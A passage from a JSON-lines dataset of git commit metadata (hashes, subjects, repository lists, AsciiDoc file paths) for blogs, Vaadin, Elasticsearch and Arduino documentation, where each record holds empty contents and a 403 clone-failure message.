'_posts\/2020-04-27-the-onboarding.adoc'","message":"Renamed '_posts\/2020-04-27-The-onboarding.adoc' to '_posts\/2020-04-27-the-onboarding.adoc'","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-04-27-the-onboarding.adoc","new_file":"_posts\/2020-04-27-the-onboarding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6852f5252d749565a38da07ffec3761509c603f5","subject":"Documentation for function data source","message":"Documentation for function data source\n","repos":"vaadin\/vaadin-grid,vaadin\/components,Saulis\/components-1,Peppe\/vaadin-grid,Saulis\/components-1,Peppe\/vaadin-grid,vaadin\/components,Saulis\/components-1,vaadin\/components,vaadin\/vaadin-grid","old_file":"docs\/lazy-loading.adoc","new_file":"docs\/lazy-loading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Saulis\/components-1.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f13083973e8b29515cf48d49540dded3cc5c8c74","subject":"update code documentation","message":"update code documentation\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07aec06521737b8fa6b69c549a428240ed1c5d3e","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"badf6978c5d1fcec26a423a985b44dd65c4ad68a","subject":"y2b create post XBOX 360 Limited Edition Console Comparison","message":"y2b create post XBOX 360 Limited Edition Console Comparison","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-10-XBOX-360-Limited-Edition-Console-Comparison.adoc","new_file":"_posts\/2012-04-10-XBOX-360-Limited-Edition-Console-Comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86963e72017078ee9fedc664dfce866de7400c85","subject":"Update 2017-03-23-Hello-World.adoc","message":"Update 2017-03-23-Hello-World.adoc","repos":"jbutzprojects\/jbutzprojects.github.io,jbutzprojects\/jbutzprojects.github.io,jbutzprojects\/jbutzprojects.github.io,jbutzprojects\/jbutzprojects.github.io","old_file":"_posts\/2017-03-23-Hello-World.adoc","new_file":"_posts\/2017-03-23-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbutzprojects\/jbutzprojects.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c821e081dbdd649b7ede05774e15619d9884c43d","subject":"Update 2017-08-12-Finals-Week.adoc","message":"Update 2017-08-12-Finals-Week.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-12-Finals-Week.adoc","new_file":"_posts\/2017-08-12-Finals-Week.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cd1beb028974d07ae50666c7450705bbdb5442f","subject":"add pitr docs","message":"add pitr docs\n","repos":"CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers","old_file":"docs\/pitr.asciidoc","new_file":"docs\/pitr.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d381af0af449eb28f102f56ec4f6560609ffd71","subject":"Add to NOTES","message":"Add to NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ccb5d0b40baeec5a0aedd3f46e91a5db77b273d","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79c19ffb5d27b48ec6581722ef81f6d346303862","subject":"Update 2020-03-09-Translate-GLSL-to-SPIR-V-for-Vulkan-at-Runtime.adoc","message":"Update 2020-03-09-Translate-GLSL-to-SPIR-V-for-Vulkan-at-Runtime.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-03-09-Translate-GLSL-to-SPIR-V-for-Vulkan-at-Runtime.adoc","new_file":"_posts\/2020-03-09-Translate-GLSL-to-SPIR-V-for-Vulkan-at-Runtime.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32f61985de61fa28a8de032c9cce7b74e4f63adc","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d40585f6c517e4118485b47330e649b1e3197ed","subject":"docs: CLOUD-552: document auth-method config","message":"docs: CLOUD-552: document auth-method config\n","repos":"douglaspalmer\/application-templates,bparees\/application-templates,errantepiphany\/application-templates,jboss-openshift\/application-templates,josefkarasek\/application-templates,bdecoste\/application-templates,kyguy\/application-templates,knrc\/application-templates,rcernich\/application-templates","old_file":"eap\/README_SSO.adoc","new_file":"eap\/README_SSO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jboss-openshift\/application-templates.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6232d0f73a0bd57e06eb1eb148cca60f3c177509","subject":"Update 2017-02-27-Slavery.adoc","message":"Update 2017-02-27-Slavery.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2017-02-27-Slavery.adoc","new_file":"_posts\/2017-02-27-Slavery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"703f8d7b9e4b180c3dceffb7116b417d9a3f0705","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7e159d4a42bc0c4c3a67e2789edc5798e33eea9","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f825d424787d5e2ea8eed042fec21e5d9aec10b","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"445af3ecf572b1fceca2700d77dc8807c4b61248","subject":"[DOCS] Format the authenticate API (elastic\/x-pack-elasticsearch#2572)","message":"[DOCS] Format the authenticate API (elastic\/x-pack-elasticsearch#2572)\n\nOriginal commit: elastic\/x-pack-elasticsearch@bc486dc6be01eb0298a99fe10b4282f311e93faf\n","repos":"GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/en\/rest-api\/security\/authenticate.asciidoc","new_file":"docs\/en\/rest-api\/security\/authenticate.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9833de618d3208ede246781323e07c73781d23d5","subject":"Boards and Library manager command line interface documentation","message":"Boards and Library manager command line interface documentation\n","repos":"zenmanenergy\/Arduino,NaSymbol\/Arduino,drpjk\/Arduino,PeterVH\/Arduino,nandojve\/Arduino,ogahara\/Arduino,laylthe\/Arduino,steamboating\/Arduino,onovy\/Arduino,eddyst\/Arduino-SourceCode,jaimemaretoli\/Arduino,cscenter\/Arduino,tskurauskas\/Arduino,Chris--A\/Arduino,bigjosh\/Arduino,ashwin713\/Arduino,PaoloP74\/Arduino,bigjosh\/Arduino,ari-analytics\/Arduino,adafruit\/ESP8266-Arduino,stickbreaker\/Arduino,NaSymbol\/Arduino,probonopd\/Arduino,pdNor\/Arduino,SmartArduino\/Arduino-1,garci66\/Arduino,garci66\/Arduino,onovy\/Arduino,jaimemaretoli\/Arduino,karlitxo\/Arduino,ssvs111\/Arduino,ikbelkirasan\/Arduino,SmartArduino\/Arduino-1,lulufei\/Arduino,tskurauskas\/Arduino,ogahara\/Arduino,steamboating\/Arduino,tskurauskas\/Arduino,shiitakeo\/Arduino,NicoHood\/Arduino,bigjosh\/Arduino,eggfly\/arduino,ricklon\/Arduino,laylthe\/Arduino,Protoneer\/Arduino,OpenDevice\/Arduino,fungxu\/Arduino,andyvand\/Arduino-1,Protoneer\/Arduino,HCastano\/Arduino,NicoHood\/Arduino,adafruit\/ESP8266-Arduino,eduardocasarin\/Arduino,adamkh\/Arduino,ntruchsess\/Arduino-1,raimohanska\/Arduino,jmgonzalez00449\/Arduino,spapadim\/Arduino,bigjosh\/Arduino,acosinwork\/Arduino,ari-analytics\/Arduino,fungxu\/Arduino,PaoloP74\/Arduino,adamkh\/Arduino,vbextreme\/Arduino,superboonie\/Arduino,adafruit\/ESP8266-Arduino,KlaasDeNys\/Arduino,me-no-dev\/Arduino-1,paulo-raca\/ESP8266-Arduino,Alfredynho\/AgroSis,stickbreaker\/Arduino,ogferreiro\/Arduino,gestrem\/Arduino,gberl001\/Arduino,lulufei\/Arduino,NaSymbol\/Arduino,jabezGit\/Arduino,nandojve\/Arduino,superboonie\/Arduino,wdoganowski\/Arduino,chaveiro\/Arduino,jomolinare\/Arduino,xxxajk\/Arduino-1,andyvand\/Arduino-1,nkolban\/Arduino,ricklon\/Arduino,onovy\/Arduino,Chris--A\/Arduino,aichi\/Arduino-2,arunkuttiyara\/Arduino,EmuxEvans\/Arduino,ntruchsess\/Arduino-1,talhaburak\/Arduino,acosinwork\/Arduino,wilhelmryan\/Arduino,acosinwork\/Arduino,aichi\/Arduino-2,shannonshsu\/Arduino,onovy\/Arduino,paulmand3l\/Arduino,kidswong999\/Arduino,koltegirish\/Arduino,wayoda\/Arduino,SmartArduino\/Arduino-1,shannonshsu\/Arduino,jamesrob4\/Arduino,ssvs111\/Arduino,jamesrob4\/Arduino,zaiexx\/Arduino,NeuralSpaz\/Arduino,ntruchsess\/Arduino-1,karlitxo\/Arduino,mattvenn\/Arduino,xxxajk\/Arduino-1,SmartArduino\/Arduino-1,henningpohl\/Arduino,shannonshsu\/Arduino,vbextreme\/Arduino,jaehong\/Xmegaduino,ari-analytics\/Arduino,eduardocasarin\/Arduino,aichi\/Arduino-2,me-no-dev\/Arduino-1,weera00\/Arduino,talhaburak\/Arduino,tbowmo\/Arduino,adafruit\/ESP8266-Arduino,jaimemaretoli\/Arduino,adamkh\/Arduino,Gourav2906\/Arduino,raimohanska\/Arduino,damellis\/Arduino,pdNor\/Arduino,jaehong\/Xmegaduino,OpenDevice\/Arduino,myrtleTree33\/Arduino,fungxu\/Arduino,Protoneer\/Arduino,zaiexx\/Arduino,EmuxEvans\/Arduino,eggfly\/arduino,zenmanenergy\/Arduino,vbextreme\/Arduino,tomkrus007\/Arduino,xxxajk\/Arduino-1,niggor\/Arduino_cc,NicoHood\/Arduino,onovy\/Arduino,smily77\/Arduino,superboonie\/Arduino,Chris--A\/Arduino,wilhelmryan\/Arduino,zederson\/Arduino,niggor\/Arduino_cc,myrtleTree33\/Arduino,koltegirish\/Arduino,tomkrus007\/Arduino,raimohanska\/Arduino,bigjosh\/Arduino,onovy\/Arduino,karlitxo\/Arduino,PeterVH\/Arduino,ari-analytics\/Arduino,stickbreaker\/Arduino,drpjk\/Arduino,lukeWal\/Arduino,ikbelkirasan\/Arduino,PaoloP74\/Arduino,majenkotech\/Arduino,paulo-raca\/ESP8266-Arduino,eeijcea\/Arduino-1,vbextreme\/Arduino,nkolban\/Arduino,gberl001\/Arduino,andyvand\/Arduino-1,bsmr-arduino\/Arduino,Protoneer\/Arduino,tomkrus007\/Arduino,mangelajo\/Arduino,tommyli2014\/Arduino,jabezGit\/Arduino,ashwin713\/Arduino,chaveiro\/Arduino,mateuszdw\/Arduino,niggor\/Arduino_cc,Chris--A\/Arduino,jomolinare\/Arduino,jamesrob4\/Arduino,ogferreiro\/Arduino,aichi\/Arduino-2,ikbelkirasan\/Arduino,mateuszdw\/Arduino,shannonshsu\/Arduino,eddyst\/Arduino-SourceCode,arunkuttiyara\/Arduino,tomkrus007\/Arduino,stickbreaker\/Arduino,ForestNymph\/Arduino_sources,smily77\/Arduino,snargledorf\/Arduino,Gourav2906\/Arduino,steamboating\/Arduino,ari-analytics\/Arduino,tbowmo\/Arduino,paulmand3l\/Arduino,ricklon\/Arduino,arunkuttiyara\/Arduino,chaveiro\/Arduino,bsmr-arduino\/Arduino,jmgonzalez00449\/Arduino,pdNor\/Arduino,Cloudino\/Arduino,shiitakeo\/Arduino,ForestNymph\/Arduino_sources,damellis\/Arduino,weera00\/Arduino,mangelajo\/Arduino,wdoganowski\/Arduino,steamboating\/Arduino,HCastano\/Arduino,ricklon\/Arduino,ntruchsess\/Arduino-1,aichi\/Arduino-2,paulmand3l\/Arduino,PeterVH\/Arduino,tannewt\/Arduino,jaehong\/Xmegaduino,ashwin713\/Arduino,Alfredynho\/AgroSis,NeuralSpaz\/Arduino,jabezGit\/Arduino,kidswong999\/Arduino,eggfly\/arduino,laylthe\/Arduino,HCastano\/Arduino,noahchense\/Arduino-1,KlaasDeNys\/Arduino,arunkuttiyara\/Arduino,mangelajo\/Arduino,aichi\/Arduino-2,ForestNymph\/Arduino_sources,raimohanska\/Arduino,stevemayhew\/Arduino,gonium\/Arduino,shiitakeo\/Arduino,superboonie\/Arduino,jmgonzalez00449\/Arduino,jabezGit\/Arduino,damellis\/Arduino,zederson\/Arduino,KlaasDeNys\/Arduino,PeterVH\/Arduino,Protoneer\/Arduino,zaiexx\/Arduino,superboonie\/Arduino,bsmr-arduino\/Arduino,gestrem\/Arduino,byran\/Arduino,bigjosh\/Arduino,zederson\/Arduino,probonopd\/Arduino,noahchense\/Arduino-1,pdNor\/Arduino,weera00\/Arduino,andyvand\/Arduino-1,stevemayhew\/Arduino,Protoneer\/Arduino,damellis\/Arduino,probonopd\/Arduino,nandojve\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,snargledorf\/Arduino,me-no-dev\/Arduino-1,smily77\/Arduino,tskurauskas\/Arduino,lukeWal\/Arduino,cscenter\/Arduino,kidswong999\/Arduino,sanyaade-iot\/Arduino-1,ricklon\/Arduino,paulo-raca\/ESP8266-Arduino,gonium\/Arduino,ForestNymph\/Arduino_sources,paulmand3l\/Arduino,bsmr-arduino\/Arduino,andyvand\/Arduino-1,ektor5\/Arduino,paulmand3l\/Arduino,jomolinare\/Arduino,Alfredynho\/AgroSis,nkolban\/Arduino,sanyaade-iot\/Arduino-1,niggor\/Arduino_cc,Cloudino\/Arduino,jomolinare\/Arduino,ogferreiro\/Arduino,ssvs111\/Arduino,tommyli2014\/Arduino,mattvenn\/Arduino,henningpohl\/Arduino,ashwin713\/Arduino,eeijcea\/Arduino-1,EmuxEvans\/Arduino,radut\/Arduino,ntruchsess\/Arduino-1,PaoloP74\/Arduino,ari-analytics\/Arduino,koltegirish\/Arduino,zaiexx\/Arduino,tomkrus007\/Arduino,KlaasDeNys\/Arduino,jabezGit\/Arduino,fungxu\/Arduino,ashwin713\/Arduino,wilhelmryan\/Arduino,vbextreme\/Arduino,wilhelmryan\/Arduino,ogahara\/Arduino,xxxajk\/Arduino-1,Gourav2906\/Arduino,shiitakeo\/Arduino,probonopd\/Arduino,ektor5\/Arduino,Cloudino\/Arduino,Gourav2906\/Arduino,NeuralSpaz\/Arduino,PaoloP74\/Arduino,shannonshsu\/Arduino,ssvs111\/Arduino,PaoloP74\/Arduino,tommyli2014\/Arduino,garci66\/Arduino,eeijcea\/Arduino-1,mattvenn\/Arduino,pdNor\/Arduino,ektor5\/Arduino,smily77\/Arduino,nandojve\/Arduino,NeuralSpaz\/Arduino,drpjk\/Arduino,KlaasDeNys\/Arduino,jaimemaretoli\/Arduino,NaSymbol\/Arduino,sanyaade-iot\/Arduino-1,tbowmo\/Arduino,leftbrainstrain\/Arduino-ESP8266,adamkh\/Arduino,danielchalef\/Arduino,smily77\/Arduino,chaveiro\/Arduino,myrtleTree33\/Arduino,Cloudino\/Cloudino-Arduino-IDE,ogahara\/Arduino,talhaburak\/Arduino,eeijcea\/Arduino-1,jmgonzalez00449\/Arduino,stevemayhew\/Arduino,ntruchsess\/Arduino-1,me-no-dev\/Arduino-1,OpenDevice\/Arduino,lukeWal\/Arduino,garci66\/Arduino,arunkuttiyara\/Arduino,OpenDevice\/Arduino,shannonshsu\/Arduino,adafruit\/ESP8266-Arduino,ThoughtWorksIoTGurgaon\/Arduino,koltegirish\/Arduino,tomkrus007\/Arduino,ogferreiro\/Arduino,paulo-raca\/ESP8266-Arduino,tbowmo\/Arduino,NeuralSpaz\/Arduino,tannewt\/Arduino,ikbelkirasan\/Arduino,zenmanenergy\/Arduino,xxxajk\/Arduino-1,koltegirish\/Arduino,Protoneer\/Arduino,henningpohl\/Arduino,cscenter\/Arduino,PeterVH\/Arduino,lukeWal\/Arduino,eduardocasarin\/Arduino,Chris--A\/Arduino,kidswong999\/Arduino,danielchalef\/Arduino,lukeWal\/Arduino,PeterVH\/Arduino,tbowmo\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,leftbrainstrain\/Arduino-ESP8266,Gourav2906\/Arduino,OpenDevice\/Arduino,zenmanenergy\/Arduino,pdNor\/Arduino,myrtleTree33\/Arduino,byran\/Arduino,ricklon\/Arduino,paulo-raca\/ESP8266-Arduino,ikbelkirasan\/Arduino,karlitxo\/Arduino,NeuralSpaz\/Arduino,Alfredynho\/AgroSis,fungxu\/Arduino,eeijcea\/Arduino-1,tbowmo\/Arduino,karlitxo\/Arduino,snargledorf\/Arduino,Cloudino\/Arduino,eddyst\/Arduino-SourceCode,lulufei\/Arduino,drpjk\/Arduino,spapadim\/Arduino,nkolban\/Arduino,radut\/Arduino,mangelajo\/Arduino,ccoenen\/Arduino,KlaasDeNys\/Arduino,gestrem\/Arduino,ccoenen\/Arduino,byran\/Arduino,wayoda\/Arduino,tskurauskas\/Arduino,vbextreme\/Arduino,wayoda\/Arduino,PeterVH\/Arduino,acosinwork\/Arduino,ogferreiro\/Arduino,bsmr-arduino\/Arduino,ssvs111\/Arduino,eggfly\/arduino,adamkh\/Arduino,gestrem\/Arduino,wayoda\/Arduino,mattvenn\/Arduino,lukeWal\/Arduino,raimohanska\/Arduino,EmuxEvans\/Arduino,ccoenen\/Arduino,tannewt\/Arduino,tomkrus007\/Arduino,cscenter\/Arduino,snargledorf\/Arduino,niggor\/Arduino_cc,NicoHood\/Arduino,radut\/Arduino,ashwin713\/Arduino,talhaburak\/Arduino,bsmr-arduino\/Arduino,ForestNymph\/Arduino_sources,danielchalef\/Arduino,snargledorf\/Arduino,acosinwork\/Arduino,cscenter\/Arduino,ccoenen\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,eddyst\/Arduino-SourceCode,ashwin713\/Arduino,Chris--A\/Arduino,byran\/Arduino,stickbreaker\/Arduino,PaoloP74\/Arduino,smily77\/Arduino,NicoHood\/Arduino,spapadim\/Arduino,superboonie\/Arduino,ikbelkirasan\/Arduino,kidswong999\/Arduino,ogferreiro\/Arduino,eggfly\/arduino,shiitakeo\/Arduino,probonopd\/Arduino,stickbreaker\/Arduino,NicoHood\/Arduino,ogahara\/Arduino,gberl001\/Arduino,ccoenen\/Arduino,pdNor\/Arduino,gonium\/Arduino,KlaasDeNys\/Arduino,snargledorf\/Arduino,tskurauskas\/Arduino,gberl001\/Arduino,ForestNymph\/Arduino_sources,shiitakeo\/Arduino,tskurauskas\/Arduino,shiitakeo\/Arduino,drpjk\/Arduino,koltegirish\/Arduino,stevemayhew\/Arduino,adamkh\/Arduino,jomolinare\/Arduino,Cloudino\/Arduino,ektor5\/Arduino,niggor\/Arduino_cc,gestrem\/Arduino,adamkh\/Arduino,drpjk\/Arduino,jomolinare\/Arduino,gestrem\/Arduino,myrtleTree33\/Arduino,henningpohl\/Arduino,lulufei\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,steamboating\/Arduino,mateuszdw\/Arduino,jaehong\/Xmegaduino,radut\/Arduino,wdoganowski\/Arduino,probonopd\/Arduino,vbextreme\/Arduino,NeuralSpaz\/Arduino,Cloudino\/Cloudino-Arduino-IDE,nkolban\/Arduino,nkolban\/Arduino,Chris--A\/Arduino,jomolinare\/Arduino,adafruit\/ESP8266-Arduino,damellis\/Arduino,steamboating\/Arduino,ricklon\/Arduino,noahchense\/Arduino-1,HCastano\/Arduino,ikbelkirasan\/Arduino,jabezGit\/Arduino,Gourav2906\/Arduino,tbowmo\/Arduino,mattvenn\/Arduino,wayoda\/Arduino,radut\/Arduino,mateuszdw\/Arduino,ashwin713\/Arduino,zederson\/Arduino,paulo-raca\/ESP8266-Arduino,bigjosh\/Arduino,cscenter\/Arduino,Cloudino\/Cloudino-Arduino-IDE,SmartArduino\/Arduino-1,wilhelmryan\/Arduino,eeijcea\/Arduino-1,niggor\/Arduino_cc,weera00\/Arduino,stevemayhew\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,leftbrainstrain\/Arduino-ESP8266,bsmr-arduino\/Arduino,wdoganowski\/Arduino,andyvand\/Arduino-1,pdNor\/Arduino,SmartArduino\/Arduino-1,xxxajk\/Arduino-1,tommyli2014\/Arduino,me-no-dev\/Arduino-1,stickbreaker\/Arduino,chaveiro\/Arduino,ccoenen\/Arduino,gberl001\/Arduino,ntruchsess\/Arduino-1,paulmand3l\/Arduino,spapadim\/Arduino,stevemayhew\/Arduino,jamesrob4\/Arduino,EmuxEvans\/Arduino,radut\/Arduino,ntruchsess\/Arduino-1,ektor5\/Arduino,raimohanska\/Arduino,EmuxEvans\/Arduino,superboonie\/Arduino,Cloudino\/Cloudino-Arduino-IDE,HCastano\/Arduino,leftbrainstrain\/Arduino-ESP8266,wilhelmryan\/Arduino,byran\/Arduino,paulmand3l\/Arduino,kidswong999\/Arduino,me-no-dev\/Arduino-1,mateuszdw\/Arduino,fungxu\/Arduino,weera00\/Arduino,superboonie\/Arduino,tannewt\/Arduino,chaveiro\/Arduino,acosinwork\/Arduino,bsmr-arduino\/Arduino,lukeWal\/Arduino,jaehong\/Xmegaduino,mangelajo\/Arduino,jaimemaretoli\/Arduino,talhaburak\/Arduino,xxxajk\/Arduino-1,henningpohl\/Arduino,sanyaade-iot\/Arduino-1,ari-analytics\/Arduino,byran\/Arduino,weera00\/Arduino,NaSymbol\/Arduino,kidswong999\/Arduino,adamkh\/Arduino,henningpohl\/Arduino,danielchalef\/Arduino,HCastano\/Arduino,tommyli2014\/Arduino,Cloudino\/Cloudino-Arduino-IDE,eggfly\/arduino,gonium\/Arduino,sanyaade-iot\/Arduino-1,ThoughtWorksIoTGurgaon\/Arduino,eeijcea\/Arduino-1,jabezGit\/Arduino,cscenter\/Arduino,noahchense\/Arduino-1,Cloudino\/Arduino,radut\/Arduino,byran\/Arduino,shannonshsu\/Arduino,chaveiro\/Arduino,karlitxo\/Arduino,henningpohl\/Arduino,mangelajo\/Arduino,lukeWal\/Arduino,drpjk\/Arduino,adafruit\/ESP8266-Arduino,myrtleTree33\/Arduino,eduardocasarin\/Arduino,karlitxo\/Arduino,ikbelkirasan\/Arduino,niggor\/Arduino_cc,spapadim\/Arduino,bigjosh\/Arduino,mateuszdw\/Arduino,eduardocasarin\/Arduino,zaiexx\/Arduino,HCastano\/Arduino,niggor\/Arduino_cc,PaoloP74\/Arduino,eddyst\/Arduino-SourceCode,jmgonzalez00449\/Arduino,zenmanenergy\/Arduino,fungxu\/Arduino,eggfly\/arduino,majenkotech\/Arduino,zederson\/Arduino,eddyst\/Arduino-SourceCode,ssvs111\/Arduino,eduardocasarin\/Arduino,me-no-dev\/Arduino-1,mangelajo\/Arduino,ari-analytics\/Arduino,Alfredynho\/AgroSis,jmgonzalez00449\/Arduino,gonium\/Arduino,gberl001\/Arduino,noahchense\/Arduino-1,Alfredynho\/AgroSis,danielchalef\/Arduino,EmuxEvans\/Arduino,raimohanska\/Arduino,zaiexx\/Arduino,tommyli2014\/Arduino,spapadim\/Arduino,tomkrus007\/Arduino,zederson\/Arduino,stevemayhew\/Arduino,ektor5\/Arduino,talhaburak\/Arduino,steamboating\/Arduino,tbowmo\/Arduino,garci66\/Arduino,damellis\/Arduino,onovy\/Arduino,lulufei\/Arduino,garci66\/Arduino,wilhelmryan\/Arduino,shannonshsu\/Arduino,jamesrob4\/Arduino,sanyaade-iot\/Arduino-1,NicoHood\/Arduino,spapadim\/Arduino,jaehong\